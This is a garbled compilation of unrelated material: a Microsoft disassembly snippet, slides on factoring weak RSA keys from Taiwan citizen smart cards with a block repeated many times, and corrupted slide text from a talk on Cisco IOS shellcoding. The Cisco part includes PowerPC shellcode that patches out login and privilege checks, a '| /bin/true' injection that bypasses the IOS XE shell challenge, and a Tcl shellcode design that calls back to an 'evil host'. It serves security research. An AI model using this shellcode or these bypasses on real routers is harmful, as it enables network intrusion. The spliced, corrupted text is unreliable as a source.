  Send comments about this topic to MicrosoftBuild date: 3/19/2010    return S_OK;715172be 33c0             xor     eax,eax           ; eax = S_OKCopy
715172c0 5b               pop     ebx               ; restoreReturnNoEBX:715172c1 5f               pop     edi               ; restore715172c2 5e               pop     esi               ; restore715172c3 c9               leave                     ; restores EBP and ESP simultaneously715172c4 c20400           ret     0x4               ; return and clear parametersCopy
Factoring RSA keys from certified smart cards:
Coppersmith in the wild
Daniel J. Bernstein, Yun-An Chang,
Chen-Mou Cheng, Li-Ping Chou,
Nadia Heninger, Tanja Lange,
Nicko van Someren
Taiwan Citizen Digital Certificate
Government-issued smart cards allow citizens to
▶file income taxes,
▶update car registrations,
▶transact with government agencies,
▶interact with companies (e.g. Chunghwa Telecom) online.
FIPS-140 and Common Criteria Level 4+ certified.
Taiwan Citizen Digital Certificate
Collected 3,002,000 certificates (all using RSA keys) from national
LDAP directory.
2.3 million distinct 1024-bit RSA moduli, 700,000 2048-bit moduli.
Certificate of Chen-Mou Cheng
Data: Version: 3 (0x2)
Serial Number: d7:15:33:8e:79:a7:02:11:7d:4f:25:b5:47:e8:ad:38
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=TW, O=XXX
Validity
Not Before: Feb 24 03:20:49 2012 GMT
Not After : Feb 24 03:20:49 2017 GMT
Subject: C=TW, CN=YYY serialNumber=0000000112831644
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit) Modulus:
00:bf:e7:7c:28:1d:c8:78:a7:13:1f:cd:2b:f7:63:
2c:89:0a:74:ab:62:c9:1d:7c:62:eb:e8:fc:51:89:
b3:45:0e:a4:fa:b6:06:de:b3:24:c0:da:43:44:16:
e5:21:cd:20:f0:58:34:2a:12:f9:89:62:75:e0:55:
8c:6f:2b:0f:44:c2:06:6c:4c:93:cc:6f:98:e4:4e:
3a:79:d9:91:87:45:cd:85:8c:33:7f:51:83:39:a6:
9a:60:98:e5:4a:85:c1:d1:27:bb:1e:b2:b4:e3:86:
a3:21:cc:4c:36:08:96:90:cb:f4:7e:01:12:16:25:
90:f2:4d:e4:11:7d:13:17:44:cb:3e:49:4a:f8:a9:
a0:72:fc:4a:58:0b:66:a0:27:e0:84:eb:3e:f3:5d:
5f:b4:86:1e:d2:42:a3:0e:96:7c:75:43:6a:34:3d:
6b:96:4d:ca:f0:de:f2:bf:5c:ac:f6:41:f5:e5:bc:
fc:95:ee:b1:f9:c1:a8:6c:82:3a:dd:60:ba:24:a1:
eb:32:54:f7:20:51:e7:c0:95:c2:ed:56:c8:03:31:
96:c1:b6:6f:b7:4e:c4:18:8f:50:6a:86:1b:a5:99:
d9:3f:ad:41:00:d4:2b:e4:e7:39:08:55:7a:ff:08:
30:9e:df:9d:65:e5:0d:13:5c:8d:a6:f8:82:0c:61:
c8:6b
Exponent: 65537 (0x10001)
.
.
.

All-pairs GCD algorithm factors
103 keys.
Most commonly shared factor appears 46 times
c0000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
000000000000000000000000000002f9
Next most common factor appears 7 times
c9242492249292499249492449242492
24929249924949244924249224929249
92494924492424922492924992494924
492424922492924992494924492424e5
Hypothesized key generation process for weak primes:
1. Choose a bit pattern of length 1, 3, 5, or 7 bits.
2. Repeat it to cover 512 bits.
3. For every 32-bit word, swap the lower and upper 16 bits.
4. Fix the most significant two bits to 11.
5. Find the next prime greater than or equal to this number.
Factoring by trial division
1. Generate all primes of this form.
2. Trial division.Enumerating all patterns factored 18 new keys .
Extending to patterns of length 9: 4 more keys .
Factoring by trial division
1. Generate all primes of this form.
2. Trial division.
Enumerating all patterns factored 18 new keys .
Extending to patterns of length 9: 4 more keys .
Some more prime factors
c0000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
000000000000000000000000000101ff
c0000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000100000177

Factoring with Coppersmith
1. For all patterns aand moduli N, run LLL on

X2Xa 0
0X a
0 0 N

2. Hope a+xfactors N.
▶For 1024-bit N,Xas large as 170 bits.
▶Factored 39 new keys
ffffaa55ffffffffff3cd9fe3ffff676
fffffffffffe00000000000000000000
00000000000000000000000000000000
0000000000000000000000000000009d
c000b800000000000000000000000000
00000000000000000000000000000000
00000680000000000000000000000000
00000000000000000000000000000251
Factoring with Bivariate
Coppersmith
Search for prime factors of the form
p=a+ 2tx+y
▶Works with 6, 10, or 15-dimensional lattices.
▶Ran on 20 most common patterns and factored
13 more keys .
Why are government-issued smartcards generating
weak keys?
Card behavior very clearly not FIPS-compliant.Hypothesized failure:
▶Hardware ring oscillator gets stuck in some
conditions.
▶Card software not post-processing RNG output.
Why are government-issued smartcards generating
weak keys?
Card behavior very clearly not FIPS-compliant.
Hypothesized failure:
▶Hardware ring oscillator gets stuck in some
conditions.
▶Card software not post-processing RNG output.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.Future work:
▶Breaking RSA-1024 with Fermat factoring.
▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.
▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.
▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.
Future work:▶Breaking RSA-1024 with Fermat factoring.
▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.
▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.
▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.
Future work:
▶Breaking RSA-1024 with Fermat factoring.▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.
▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.
▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.
Future work:
▶Breaking RSA-1024 with Fermat factoring.
▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.
▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.
Future work:
▶Breaking RSA-1024 with Fermat factoring.
▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.
▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.
Lessons:
Nontrivial GCD is not the only way RSA can fail
with bad RNG.
Future work:
▶Breaking RSA-1024 with Fermat factoring.
▶Breaking RSA-1024 using Adi Shamir’s secret
database of all primes.
▶Breaking RSA-1024 using
1024 = 2 ∗2∗2∗2∗2∗2∗2∗2∗2∗2.
▶Breaking RSA-1024 using Intel’s new
RDRAND NSAKEY instruction.CISCO IOS SHELLCODE: ALL-IN-ONE George Nosenko gnosenko@dsec.ru	
CISCO IOS SHELLCODE:  ALL-IN-ONE 
George	Nosenko	• Security	researcher	at	Digital	Security	• Bug	Hunter	• Exploit	Developer	
CISCO IOS SHELLCODE:  ALL-IN-ONE Agenda Part	2:	Cisco	IOS	Shellcoding	• MoEvaEon	• Main	Problems	• Image-independet	Shellcodes	§ Disassembling	Shellcode	§ Interrupt-Hijack	Shellcode	• Tcl	Shellcode	§ How	does	it	work?		§ Features	§ LimitaEons	§ How	is	it	made?	Part	1:	Cisco	IOS	Reverse	Engineering	• Main	Problem	• Subsystem	• Registry	• Processes	• Glue	Code	/	Simple	Code	/	Dead	Code	• Command	Parser	• Where	is	libc?	• Other	• How	to	debug	Cisco	IOS	• How	to	debug	Cisco	IOS	XE	
CISCO IOS SHELLCODE:  ALL-IN-ONE 
Prior works AUacking	Network	Embedded	System	Felix	‘FX’	Lindner	2002	The	Holy	Grail	Cisco	IOS	Shellcode	And	ExploitaEon	Techniques	Michael	Lynn	2005	Cisco	IOS	Shellcodes	Gyan	Chawdhary,	Varun	Uppal	2007	Remote	Cisco	IOS	FTP	Exploit	Andy	Davis	2007	Killing	the	myth	of	Cisco	IOS	rootkits:	DIK	SebasEan	Muniz	2008	Cisco	IOS	-	AUack	&	Defense.	The	State	of	the	Art	Felix	’FX’	Lindner	2008	Router	ExploitaEon	Felix	’FX’	Lindner	2009	Fuzzing	and	Debugging	Cisco	IOS	SebasEan	Muniz,	Alfredo	Ortega	2011	Killing	the	Myth	of	Cisco	IOS	Diversity	Ang	Cui,	JaEn	Kataria,	Salvatore	J.	Stolfo	2011	Research	on	Cisco	IOS	Security	Mechanisms	Xiaoyan	Sua	2011	Cisco	IOS	Rootkits	and	Malware	Jason	Nehrboss	2012	SYNful	Knock	A	CISCO	IMPLANT	Bill	Hau,	Tony	Lee,	Josh	Homan	2015	
CISCO IOS SHELLCODE:  ALL-IN-ONE Cisco Diversity Overview OperaEon	Systems	Cisco	IOS	Cisco	IOS	XE	(based	on	Linux)	Cisco	NX-OS	(based	on	Linux)	Cisco	IOS	XR	(based	on	QNX)	ASA	OS	(based	on	Linux)	CatOS	Architectures	PowerPC	(Book-E)	MIPS	Intel	x86_x64	Over		300	000	unique	images	
Killing	the	Myth	of	Cisco	IOS	Diversity	
CISCO IOS SHELLCODE:  ALL-IN-ONE Part 1 CISCO	IOS	RE	
CISCO IOS SHELLCODE:  ALL-IN-ONE Main problem • Designed	as	a	single	unit	-	a	large,	staEcally	linked	ELF	binary	• Everything	is	highly	integrated	and	non-modular	• There	is	no	API	Image	size	≈	142	MB		FuncEons	≈	350	000	IDA	Database	≈	2.5	GB		Binwalk	≈	100	GB		

CISCO IOS SHELLCODE:  ALL-IN-ONE Reverse in context Inside	Cisco	IOS	Sooware	Architecture	Vijay	Bollapragada,	CCIE		CurEs	Murphy,	CCIE		Russ	White,	CCIE		Cisco	IOS	Programmer’s	Guide	Architecture	Reference	Sooware	Release	12.0	Fioh	EdiEon	February	1999	

CISCO IOS SHELLCODE:  ALL-IN-ONE Unpacking Firmware 
• The	image	may	be	self-decompressing	• The	image	may	contain:	§ 	loader	§ 	driver	for	flash	§ 	firmware	for	addiEonal	hardware	§ 	cerEficates	• Binwalk	will	work	successfully,	but	it	generates	a	large	output	• To	automate	the	analysis,	you	need	to	write	an	unpacker			Killing	the	myth	of	Cisco	IOS	rootkits:	DIK		
CISCO IOS SHELLCODE:  ALL-IN-ONE Trace strings 
FuncEon	names	Trace	strings	
CISCO IOS SHELLCODE:  ALL-IN-ONE Trace strings def	rename_funcs(strings=None,	paUern=None):										names	=	[s	for	s	in	strings	if	re.search(paUern,	str(s))	is	not	None]						for	name	in	names:												for	ref	in	DataRefsTo(name.ea):													old_name	=	GetFuncEonName(ref)													func_addr	=	LocByNameEx(ref,	old_name)														if	func_addr	==	BADADDR		or																	has_user_name(getFlags(func_addr)):																break														MakeName(	func_addr,		str(name))																									break		if	__name__	==	"__main__":					rename_funcs(strings=Strings(),	paUern=r'^[a-z]{3,}_[a-z]+_')	
≈	8.5%	
CISCO IOS SHELLCODE:  ALL-IN-ONE Subsystems struct subsystype_ { unsigned int magic1; unsigned int magic2; unsigned int header_version; unsigned int kernel_majversion; unsigned int kernel_minversion; char*        namestring; unsigned int subsys_majversion; unsigned int subsys_minversion; unsigned int subsys_editversion; void*        init_address; SUBSYSTEM_CLASS class; unsigned int    id; char*        properties[SUBSYS_MAX]; }; Router#	show	subsys	?			class				Show	subsystems	by	class			memory			Show	subsystems	memory	usage			name					Show	subsystems	by	name			running		Show	subsystem	information	about	running	processes			|								Output	modifiers			<cr>		Router#	show	subsys		Name																Class					Version	cef																	Kernel						1.000.000	hw_api_trace_chain		Kernel						1.000.001	mtrie															Kernel						2.000.001	adj_trace_chain					Kernel						1.000.001	alarm															Kernel						1.000.001	arp																	Kernel						1.000.001	arp_app_data								Kernel						1.000.001	...	
CISCO IOS SHELLCODE:  ALL-IN-ONE Subsystems 
All	data	relaEng	to	a	subsystem	is	located	below	the	header	

CISCO IOS SHELLCODE:  ALL-IN-ONE Subsystems def	create_subsytems(name='subsystype_'):					for	seg	in	get_data_segment():									for	ea	in	search(start=seg.startEA,	end=seg.endEA,	paUern='C1	5C	05	15	C1	5C	05	15'):		#	it	uses	FindBinary																										p_name,	p_func,	sysclass	=	Dword(ea	+	0x14),	Dword(ea	+	0x24),	Dword(ea	+	0x28)														SetColor(p_func,	CIC_FUNC,	get_color_by_subsysclass(sysclass))														func_name	=	GetString(p_name)													if	func_name	==	'':																	conEnue																														if	not	has_user_name(getFlags(p_func)):																	print	"ea:	0x%x	0x%x	%s"	%	(ea,	p_func,	func_name)																	MakeNameAuto(p_func,	func_name	+	'_subsys_init',	SN_NOCHECK)	
CISCO IOS SHELLCODE:  ALL-IN-ONE Registries and Services • Linker-independent	mechanism		• Service	is	an	interface	into	subsystem	• Registry	is	a	collecEon	of	services	• Service	emulates	common	C																	construct	(loop,	switch,	etc.)		• 8-12	different	types	Router#	show	registry	--------------------------------------------	CDP	:			96	services												CDP	/				1	:		List						list[001]																									0x062E6F38	...												CDP	/			14	:		Case						size[000]	list[003]	default=0x05B4ED60		return_void																													1		0x046D03BC																													2		0x046D04F4																													3		0x046D05D4												CDP	/			15	:		Value			size[000]		list[000]		default=0												CDP	/			16	:		Stub				0x064F9230	...												CDP	/			21	:		Stub				0x05B4ED64		return_zero	...												CDP	/			38	:		List						list[004]																									0x06B42A88																									0x04D24970																									0x06747680																									0x06A0CB50	...												CDP	/			54	:		Loop						list[005]																									0x06A859CC																									0x08CA07F0																									0x087AC228																									0x07EF5CE8																									0x084B034C	...												CDP	/			57	:		Retval				size[000]	list[000]	default=0x046CB720		...												CDP	:			96	services,			440	global	bytes,			600	heap	bytes	[REG_NAME][NUM_SERVICE][TYPE](SUB)[ADDR]	≈	7.4%	
CISCO IOS SHELLCODE:  ALL-IN-ONE Process (is equivalent of a thread) #include	“sched.h”	pid_t	cfork(forkproc	(*padd),	long	pp,	int	stack,	char	*name,	int	Uynum);		pid_t	process_create(process_t	(*padd),	char	*name,	stack_size_t	stack,	process_priority_t	priority);	.	.	.	result	=	process_create(bootload,		“Boot	Load”,	LARGE_STACK,	PRIO_NORMAL);	if	(result	!=	NO_PROCESS)	{		process_set_arg_num(result,	loading);		process_set_Uynum(result,	startup_Uynum);	}	Router#	show	processes		CPU	utilization	for	five	seconds:	2%/0%;	one	minute:	2%;	five	minutes:	2%		PID	QTy							PC	Runtime	(ms)				Invoked			uSecs				Stacks	TTY	Process				1	Cwe		5B63990										152						11998						1225228/26000		0	Chunk	Manager				2	Csp		6DE5568											48						37481							122612/23000		0	Load	Meter				3	Mwe		44929A4											12					182631							028740/29000		0	BGP	Scheduler				4	Mwe		7A426D8												0									11							025748/26000		0	Retransmission	
CISCO IOS SHELLCODE:  ALL-IN-ONE Process. How to find a process_create() fast  
Router#	show	memory	processor	|	include	Process		Address						Bytes					Prev					Next	Ref					PrevF				NextF	Alloc	PC		what		12474BAC	0000000160	124737F8	12474C78	001		--------	--------	08DF1798		*Init*	12474C78	0000000160	12474BAC	12474D44	001		--------	--------	08DF1798		*Init*	...	1247BD18	0000004288	1247B710	1247CE04	001		--------	--------	0638C148		TTY	data	12483A50	0000000688	12483984	12483D2C	001		--------	--------	05B9AFDC		Process	...	• Process	is	an	internal	structure		(similar	to	PEB)	• Process	is	allocated	in	cfork()	at	05B9AFDC		• A	cfork	()	is	called	in	process_create()	
CISCO IOS SHELLCODE:  ALL-IN-ONE Process def	find_all_proocess(func=None,	proc_name_reg='r4'):					ea	=	func.startEA										for	i,	ref	in	enumerate(CodeRefsTo(ea,	True)):									proc_ep,	proc_name	=	get_proc_entry_point(ref),	get_proc_name(ref,	dest_reg=proc_name_reg)																		if	proc_ep	is	None:	conEnue										if	has_dummy_name(GetFlags(proc_ep)):													if	MakeNameEx(proc_ep,	proc_name,	SN_NOWARN)	==	0:																	print	'[!]	%d:	MakeName	failed	ref=0x%x:	0x%x,	%s'	%	(i,	ref,	proc_ep,	proc_name)										SetColor(proc_ep,	CIC_FUNC,	COLOR)		if	__name__	==	'__main__':					find_all_proocess(func=get_func(get_name_ea(BADADDR,	'process_create')) 
CISCO IOS SHELLCODE:  ALL-IN-ONE Glue Code / Simple Code / Dead Code .text:041AF174													glue_sub_41AF174__memcpy:	.text:041AF174	.text:041AF174	3D	60	08	DF	lis							r11,	_memcpy@h	.text:041AF178	39	6B	5F	24	addi						r11,	r11,	_memcpy@l	.text:041AF17C	7D	69	03	A6	mtctr					r11	.text:041AF180	4E	80	04	20	bctr	.text:041AF180													#	End	of	function	glue_sub_41AF174__memcpy	.text:04110830													get_value_at_wC0011F4_o110:	.text:04110830																																																						.text:04110830	3D	20	0C	00	lis							r9,	off_C0011F4@h	.text:04110834	80	69	11	F4	lwz							r3,	off_C0011F4@l(r9)	.text:04110838	38	63	01	10	addi						r3,	r3,	0x110	.text:0411083C	4E	80	00	20	blr	.text:0411083C													#	End	of	function	get_value_at_wC0011F4_o110	.text:0412E5FC													return_one:	.text:0412E5FC	38	60	00	01	li								r3,	1	.text:0412E600	4E	80	00	20	blr	.text:0412E600													#	End	of	function	return_one	FindBinary(	7D	69	03	A6	4E	80	04	20	)	
FindBinary(	38	60	00	01	4E	80	00	20	)	FindBinary(	3D	20	??	??	80	69	??	??							38	63	??	??	4E	80	00	20	)	≈	19%	
CISCO IOS SHELLCODE:  ALL-IN-ONE Command Parser Tree • Located	under	the	subsystem	header		• Node	contains	different	informaEon		depending	on	the	type	• The	root	node	has	type	=	0x56	struct tree_node { tree_node*   right; tree_node*   left; unsigned int type; payload*     data; unsigned int unknown; };	struct payload_cmd { char* name; char* description; ... permission priv; ... }; struct payload_handler { void* handler; void* arg; ... };	type = 0x1A type = 0x45 type = 0x56 payload = 0x1A1A1A1A 
CISCO IOS SHELLCODE:  ALL-IN-ONE Where is libc? • In	my	case,	libc	is	located	at	end	of	the	code	in	.text	• libc	is	a	layer	over	OS	service		(prin,		fopen,	socket,	malloc...)	• libc	is	a	collecEon	of	base	funcEons							(memcpy,	strcpy,	stncat...)		• A	base	funcEon	is	a	simple	code	i.e.		has		a	liUle	cycloma6c	complexity	Look	for	all	simple	funcEons	around	the	end	of	the	code	

CISCO IOS SHELLCODE:  ALL-IN-ONE Magic People, Voodoo People! Process		0xBEEFCAFE	-	Process	Block		Memory		0xAB1234CD	-	Heap	Block		0xFD0110DF	-	Red	Zone		0xDEADB10B	-	Pool		0xAFACEFAD	-	Packet		Other		0x1A1A1A1A	-	Parser	Root	Node		0xABABABAB	-	TCP	socket	(TCB)			0xDEADCODE	-	Invalid	interrupt	handler	Image/Boot/Code	signing		0xFEEDFACE	-	Envelope	header		0xBAD00B1E	-	Flash	Driver	(atafslib)		0xBEEFCAFE	-	Key	Record	Info	
CISCO IOS SHELLCODE:  ALL-IN-ONE Cisco Discovery Router#	show	processes	?			cpu					Show	CPU	use	per	process			memory		Show	memory	use	per	process	Router#	show	memory	?				allocating-process		Show	allocating	process	name				io																		IO	memory	stats				processor											Processor	memory	stats				summary													Summary	of	memory	usage	per	alloc	PC				transient		Router#	show	stack	1	Process	1:		Chunk	Manager			Stack	segment	0x1247D30C	-	0x1248389C			FP:	0x12483860,	RA:	0x5B9CBFC			FP:	0x12483888,	RA:	0x5B63994			FP:	0x12483890,	RA:	0x6DEEFA0			FP:	0x0,	RA:	0x6DE8834	Router#	show	buffers	all	?			dump				Show	buffer	header	and	all	data			header		Show	buffer	header	only			packet		Show	buffer	header	and	packet	data			pool				Buffers	in	a	specified	pool		Router#	show	list		List	Manager:							10944	lists	known,	5907113	lists	created									ID			Address		Size/Max			Name										1			FA7CA30				10/-					Region	List										2			E9C9560					1/-					I/O										3			E9C85D0					2/-					Processor	Router#	show	tcp	brief	all			TCB							Local	Address			Foreign	Address		(state)			57B455EC		0.0.0.0.64999			*.*															LISTEN			56FAD21C		0.0.0.0.34154			*.*															LISTEN		Router#	show	ip	sockets	Router#	show	version	Router#	show	tech-support	Router#	show	inventory		Router#	show	module		Router#	show	region	Router#	show	module	Router#	show	platform	hardware	tlb			
CISCO IOS SHELLCODE:  ALL-IN-ONE Debugging under Cisco IOS Router>	enable	Router#	gdb	kernel	• Cisco	IOS	contains	a	GDB	server,	but...	• It	doesn’t	work	with	a	generic	GDB	client	L	because	the	RSP	protocol	is	a	liUle	different			• You	can:		use	ROMMON;		patch	old	GDB;		use	IODIDE;		create	an	adapter	for	IDA	Pro.		

CISCO IOS SHELLCODE:  ALL-IN-ONE Debugging under Cisco IOS XE (3.3.5SE) • Cisco	IOS	doesn’t	contain	a	GDB	server,	but...	• You	can	build	(staEc)	gdbserver	and	GDB	for	target	plaorm	• Then	copy	gdbserver	to	device	and	get	Linux	Shell	Switch>	enable	Switch#	configure	terminal	Switch(config)#	service	internal	Switch(config)#	end	Switch#	request	system	shell	Activity	within	this	shell	can	jeopardize	the	functioning	of	the	system.	Are	you	sure	you	want	to	continue?	[y/n]	Y	Challenge:e2a41a61930e92d5da...	Please	enter	the	shell	access	response	based	on	the	above	challenge...	aaa	|	/bin/true		[Switch:/]$	uname	-a	Linux	Switch	2.6.32.59-cavium-octeon2.cge-cavium-octeon...	mips64	GNU/Linux	• AUach	gdbserver	to	process	“iosd”		(flash:/	map	at	/mnt/sd3/user)	
[Switch:/mnt/sd3/user/gdbservers]$	./gdbserver.mips	/dev/ttyS0	--attach	8566	
CISCO IOS SHELLCODE:  ALL-IN-ONE Part 2 CISCO	SHELLCODING	
CISCO IOS SHELLCODE:  ALL-IN-ONE Motivation 
Our	pentesters	ooen	deal	with	Cisco	equipment,	parEcularly	with	binary	vulnerabiliEes	In	public,	there	is	no	shellcode	for	the	needs	of	pentesters	We	need	a	flexible	and	powerful	tool	
CISCO IOS SHELLCODE:  ALL-IN-ONE Main problems / Earlier shellcode .equ ret,   0x804a42e8 # hardcode .equ login, 0x8359b1f4 # hardcode .equ god,   0xff100000 .equ priv,  0x8359be64 # hardcode  main:  # login patch begin  lis 9, login@ha  la 9,  login@l(9)  li 8,0  stw 8, 0(9)  # login patch end   # priv patch begin  lis 9, priv@ha  la 9,  priv@l(9)  lis 8, god@ha  la 8,  god@l(8)  stw 8, 0(9)  # priv patch end     # exit code       lis     10, ret@ha       addi    4, 10, ret@l       mtctr   4       bctrl • There	is	no	open	API	or	syscall’s	for	a	third	party	developer.	System	calls	are	the	interface	into	ROMMON		§ put	char	in	console	§ reboot	§ change	confreg,	etc	• Cisco	IOS	Binary	Diversity	• Cisco	IOS	is	highly	integrated	(staEc	linked)	one	big	ELF		without	any	modules	(e.g.	*.so)	Cisco	IOS	Bind	shellcode	by	Varun	Uppal	Cisco	IOS	Connectback	shellcode	by	Gyan	Chawdhary	Cisco	IOS	Shellcodes	–	BlackHat	USA	2008	Tiny	shellcode	by	Gyan	Chawdhary	
CISCO IOS SHELLCODE:  ALL-IN-ONE Image-independent shellcodes 1. Signature-based	Shellcode	by	Andy	Davis		-	Version-independent	IOS	shellcode,	2008	Invariant	is	a	structure	of	code	2. Disassembling	Shellcode	by	Felix	‘FX’	Lindner	-	Cisco	IOS	Router	ExplotaEon,	2009	Invariant	is	an	unique	string	3. Interrupt-Hijack	Shellcode	by	Columbia	University	NY	-	Killing	the	Myth	of	Cisco	IOS	Diversity,	2011	Invariant	is	an	interrupt	handler	rouEnes	All	leverage	a	common	Cisco	IOS	invariant	to	overcome	a	binary	diversity	
CISCO IOS SHELLCODE:  ALL-IN-ONE Disassembling Shellcode 
.data	.text	Basic	technique	1. Find	a	unique	string	to	determine	its	address	2. Look	for	a	code	which	references	this	string	3. Patch	the	funcEon	Pros	&	Cons	• Reliable	-	it	works	on	a	wide	range	of	Cisco	equipment	• Full	interacEon,	but	it	is	not	a	covert	• We	have	to	be	constrained	by	only	IOS	shell	• May	cause	watchdog	Emer	excepEons	to	be	thrown,	which	terminates	and	logs	all	long	running	processes	Cisco	IOS	Router	ExplotaEon,	2009	Killing	the	Myth	of	Cisco	IOS	Diversity,	2011	
CISCO IOS SHELLCODE:  ALL-IN-ONE Interrupt-Hijack Shellcode Two-stage	aUack	Stage	1:		1.	Unpack	the	second-stage	shellcode		2.	Locate	ERET	instrucEon		3.	Intercept	all	interrupt	handlers	Stage	2:		1.	Receive	command	by	looking	for	incoming	packets	with				specific	format	2.	Execute	command	Pros	&	Cons	• Fast,	Stealth,	High	Privilege	• Create	a	hidden	channel	over	ICMP	• It	has	a	complex	structure,	it	operates	asynchronously	• It	presupposes	a	database	containing	the	image-dependent	payload	to	stage	3	• Rootkit-oriented	Killing	the	Myth	of	Cisco	IOS	Diversity,	2011	
Stage	1	
Stage	2	
CISCO IOS SHELLCODE:  ALL-IN-ONE Interesting fact about SYNful Knock  
It	seems	that	the	SYNful	Knock	implant	works	in	a	similar	way	as	the	Interrupt-Hijack	shellcode	does	FireEye:	SYNful	Knock	A	CISCO	IMPLANT	
CISCO IOS SHELLCODE:  ALL-IN-ONE Requirements to our shellcode • Image	and	CPU	architecture	should	be	independent	• Works	on	a	wide	range	of	Cisco	equipment	• Pentest-oriented	• The	most	powerful	and	flexible	• So	fast	that	not	to	be	caught	by	a	watchdog	

CISCO IOS SHELLCODE:  ALL-IN-ONE Demo	0x01	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tool Command Language • Invented	by	John	K.	Ousterhout,	Berkeley,	1980s	hUp://www.tcl.tk	• Interpreted	Language,	runEme	available	for	many	plaorms	(socket,	files,	regexp,	list,	etc.)	• Tcl	has	been	included	in	Cisco	IOS	as	a	generic	scripEng	language	since	2003	(Release	12.3(2)T)	• In	IOS,	Tcl	is	extended	by	special	commands:	§ exec	-	executes	an	IOS	shell	command	§ ios_config	-	changes	configuraEon	§ typeahead	-	emulates	a	user	input	§ etc.	• Tcl	Policy	for	Embedded	Event	Manager	(EEM)	
Cisco	Feature	Navigator	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl and Pentesting • Almost	the	only	way	to	extend	the	funcEonality		of	Cisco	IOS	• Tcl	scripts	are	portable	between	different	plaorms	Backdoors	CreaEng	Backdoors	in	Cisco	IOS	using	Tcl		Tools	IOSMap:	TCP	and	UDP	Port	Scanning	on	Cisco	IOS	Plaorms	IOScat	-	a	Port	of	Netcat's	TCP	funcEons	to	Cisco	IOS		Malware	IOSTrojan:	Who	really	owns	your	router?		Cisco	IOS	Rootkits	and	Malware	(Hakin9	Vol2	No4)	More	Ideas	(TwiUer	as	CC,	Bot,	Flood,	Exploit)	AUacking	with	Cisco	devices	PH-Neutral	2009	AUacking	with	Cisco	devices	Hashdays	2010	AUacking	with	Cisco	devices	HSLU	2011	Cisco	Support	Community/EMM	ScripEng	Shellcode	Felix	‘FX’	Lindner	first	proposed	the	use	of	Tcl	in	the	shellcode	Cisco	IOS	Router	ExplotaEon	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Determine the memory layout MoEvaEon	• To	reduce	the	search	Eme		• Not	to	cause	an	access	violaEon		Router#	show	platform	hardware	tlb		Virt	Address	range							Phy	Address	range								W-I-M-G-E-S		Attr	TS	ESEL	============================================================================	0xFF000000-0xFFFFFFFF			0x0_FF000000-0x0_FFFFFFFF		1-1-0-1-0-0		RWX		0		(0)	.	.	.	0x04000000-0x07FFFFFF			0x0_04000000-0x0_07FFFFFF		0-0-1-0-0-0		RWX		0		(5)	0x08000000-0x0BFFFFFF			0x0_08000000-0x0_0BFFFFFF		0-0-1-0-0-0		R-X		0		(6)	0x0C000000-0x0FFFFFFF			0x0_0C000000-0x0_0FFFFFFF		0-0-1-0-0-0		RW-		0		(7)	.	.	.	• Have	to	use	the	System	Purpose	Registers	(SPR)	• This	method	depends	on	the	processor	architecture	• We	can	skip	this	step	• Because	our	shellcode	is	developed	in	C,	it's	not	a	big	problem	
